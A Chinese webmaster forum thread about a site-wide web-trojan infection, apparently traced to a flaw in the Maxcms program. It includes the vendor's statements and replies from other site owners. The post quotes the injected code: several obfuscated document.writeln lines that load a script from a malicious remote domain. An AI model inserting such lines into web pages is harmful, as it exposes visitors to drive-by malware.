我知道我为什么被挂马了（倒霉）原来不只我一个被挂马。（有人说是马灾）

昨天发现论坛被GOOGLE记了一次过。我还以为是GOOGLE搞错了。结果我今天早上一打开自己的论坛，瑞星杀毒软件就报病毒。

不是一个页面有病毒，而是所有的页面。包括DZ后台，UC后台，UCHOME的后台。就连我备份时都提示有毒。我当时就傻了（偶是采鸟重没有遇到过）

马上到DZ论坛上来找解决的方法。按论坛上说的进行文件校验，查找被修改我文件。把上面提示的改了。可还是有（在DZ的后台没有了）

偶有到FTP上去一个一个的看。那是不看不知道，一看下一掉。我晕99%的文件都挂了马了。（htm,,js,php,asp都被挂了）

代码 复制 - 运行

document.writeln("<script src=\"http://m%79sq2.cn\"><\/script>");
document.writeln("<script src=\"http://mysq2%2Ecn\"><\/script>");
document.writeln("<script src=\"http://mysq%32.cn\"><\/script>");
document.writeln("<script src=\"http://mys%712.cn\"><\/script>");
document.writeln("<script src=\"http://mysq2.%63n\"><\/script>");
document.writeln("<script src=\"http://%6Dysq2.cn\"><\/script>");
document.writeln("<script src=\"http://m%79sq2.cn\"><\/script>");
document.writeln("<script src=\"http://my%73q2.cn\"><\/script>");

偶就不知道怎么办好了。只有最不想做的方法恢复。就是全部重装搞了一下午才搞好。偶还遗失了UCHOME的数据5555555555（搞忘了备分就把文件删了）

晚上没有事去马克斯论坛一看，才知道是马克斯程序出来重大漏洞。很多用马克斯程序的都被挂了马。偶看到的只是一部份（因为马克斯不准讨论。所有讨论挂马问题贴子都被删了）

马克斯官方还不承认是程序有漏洞。是在是可恶。还说是站长自己的责任

代码 复制 - 运行

鉴于近期一些用户的站点频繁被挂马，官方专门联系了这批用户反馈情况，调查结果显示，原因如下


1.没有修改后台登陆账号、密码
这个是最基本常识，如果你连登陆账号都不改，不被挂马简直没有天理了


2.没有修改后台目录名称
为了进一步确保你的密码不被黑客工具所暴力破解，修改后台目录名称是个好办法


官方一再发置顶帖声明，让大家务必做到以上两点，为什么很多用户就是不听呢
为了让大家辛苦经营的站点不被挂马，为了让大家辛勤耕耘的果实免遭不白蹂躏，希望大家做好安全防护工作，切记切记！

 

代码 复制 - 运行

按石头说的应该暂时没有问题，我们也在详细的检查代码，是否有可利用的漏洞
官方昨天的确服务器被入侵过，现在临时换了一台先上，原来那台已经送去公安检查了，稍安勿躁，官方会给出引导方案。

所有涉及挂马的问题请在此贴讨论，其它清除。

 

马克斯官方的话

马克斯官方自己没有能力就说站长

我改了密码，为什么还是被挂马了，还有其他站长改了密码改了路径为什么也被挂马了，这不是你程序问题，那是什么问题。

BS马克斯

Re:我知道我为什么被挂马了（倒霉）原来不只我一个被挂马。（有人说是马灾）

我是新来的。哈哈。。。
我改了密码，为什么还是被挂马了，还有其他站长改了密码改了路径为什么也被挂马了，这不是你程序问题，那是什么问题。
网站服务器有漏洞！！！！！！！！！！！！！！

Re:我知道我为什么被挂马了（倒霉）原来不只我一个被挂马。（有人说是马灾）

我关注中。。。。。。。。。。

Re:我知道我为什么被挂马了（倒霉）原来不只我一个被挂马。（有人说是马灾）

关注哦